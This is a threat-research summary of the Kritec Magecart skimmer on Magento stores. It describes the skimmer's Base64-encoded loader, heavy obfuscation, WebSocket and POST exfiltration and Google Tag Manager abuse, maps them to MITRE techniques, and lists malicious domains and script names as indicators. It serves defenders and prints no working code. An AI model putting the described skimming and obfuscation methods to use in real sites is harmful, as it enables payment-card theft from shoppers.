Threat Research

New Kritec Magecart skimmer found on Magento stores

Securonix

Two sentences summarizing the content: A new Magecart skimmer family named Kritec has been discovered on Magento stores, appearing alongside a separate skimming campaign and sharing indicators of compromise with older campaigns. Kritec loads its malicious JavaScript in a heavily obfuscated, Base64-encoded manner and uses WebSocket or HTTP POST exfiltration, with abuse of Google Tag Manager observed. #Kritec #Magecart #GoogleTagManager #LCBO #Umbro

Keypoints

  • Kritec is a newly identified Magecart skimmer found on Magento stores, distinct from earlier WebSocket-based campaigns.
  • Some compromised stores loaded both Kritec and another skimmer at the same time, increasing the risk of repeated credit card data theft.
  • The Kritec campaign loads its skimming code via a loading method that begins with a Base64-encoded domain, then decodes to reach the actual code.
  • The injected JavaScript is heavily obfuscated, likely using an obfuscator.io-style technique.
  • Data exfiltration methods vary: some instances use WebSocket for exfiltration, while others rely on HTTP POST requests.
  • Kritec and related GTM abuse are observed as separate campaigns, with Cloudflare being used to hide infrastructure; Malwarebytes protections shield customers.

MITRE Techniques

  • [T1027] Obfuscated/Compressed Files and Information – The skimmer code is heavily obfuscated (likely via obfuscator.io). ‘The injected code … is heavily obfuscated (likely via obfuscator.io)’
  • [T1132] Data Encoding – The first domain is encoded in Base64 and a Base64 response is generated; decoding reveals a URL pointing to the actual skimming code. ‘encoded in Base64’ and ‘Decoding it reveals a URL pointing to the actual skimming code’
  • [T1071] Web Protocols – Data exfiltration uses WebSocket and HTTP POST; the campaign exfiltrates stolen data via WebSocket or POST requests. ‘data exfiltration is done differently … WebSocket skimmer while … POST request’
  • [T1105] Ingress Tool Transfer – The loader fetches the actual skimming code from a remote URL after decoding the Base64 domain, indicating payload download from a remote source. ‘URL pointing to the actual skimming code’

Indicators of Compromise

  • [Domain] context – cloud-cdn.org, kritec.pics
  • [Domain] additional IOCs from Sucuri – ukatec.pics, gretit.yachts
  • [File name] script names – apex.min.js, elan-loader.js

Read more: https://www.malwarebytes.com/blog/threat-intelligence/2023/03/new-kritec-skimmer

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint